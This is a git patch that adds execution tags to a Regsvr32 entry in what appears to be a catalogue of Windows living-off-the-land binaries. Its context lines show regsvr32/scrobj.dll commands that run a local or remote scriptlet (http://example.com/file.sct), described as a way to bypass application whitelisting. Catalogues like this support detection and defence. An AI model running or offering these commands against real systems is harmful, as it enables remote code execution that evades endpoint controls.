From b452a6c3e3705fcab4103cf2189043644ab93a82 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:48:37 +0200
Subject: [PATCH] Update Regsvr32.yml Tags Added Tags Execute: Remote Execute: SCT
---
 yml/OSBinaries/Regsvr32.yml | 10 ++++++++++
 1 file changed, 10 insertions(+)
diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml
index 27067b8..43dc039 100644
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
+ - Execute: Remote
 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
 Description: Execute the specified local .SCT script with scrobj.dll.
 Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -18,6 +21,8 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
 - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
 Description: Execute the specified remote .SCT script with scrobj.dll.
 Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@@ -25,6 +30,9 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
+ - Execute: Remote
 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
 Description: Execute the specified local .SCT script with scrobj.dll.
 Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -32,6 +40,8 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
 Full_Path:
 - Path: C:\Windows\System32\regsvr32.exe
 - Path: C:\Windows\SysWOW64\regsvr32.exe